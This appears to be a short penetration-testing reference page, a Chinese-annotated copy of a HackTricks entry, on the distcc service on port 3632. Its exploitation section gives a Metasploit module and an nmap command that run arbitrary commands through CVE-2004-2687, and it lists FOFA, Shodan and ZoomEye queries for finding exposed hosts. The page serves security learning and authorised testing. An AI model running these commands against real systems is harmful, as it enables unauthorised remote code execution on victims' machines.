3632 - Distcc

💡 学习提示: 本文档介绍 3632 - distcc 的渗透测试方法，适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

3632 - 渗透测试 Distcc

基本信息

Distcc is a tool that enhances the compilation process by utilizing the idle processing power of other computers in the network. When distcc is set up on a machine, this machine is capable of distributing its compilation tasks to another system. This recipient system must be running the distccd daemon and must have a compatible compiler installed to process the sent code.

默认 port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

漏洞利用

Check if it’s vulnerable to CVE-2004-2687 to execute arbitrary code:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

I don’t think shodan detects this service.

Resources

• https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
• https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855

Post created by Álex B (@r1p)

搜索引擎语法

FOFA

# FOFA 搜索语法
port="3632"

Shodan

# Shodan 搜索语法
port:3632

ZoomEye

# ZoomEye 搜索语法
port:3632

📖 参考资料

• HackTricks - 3632-distcc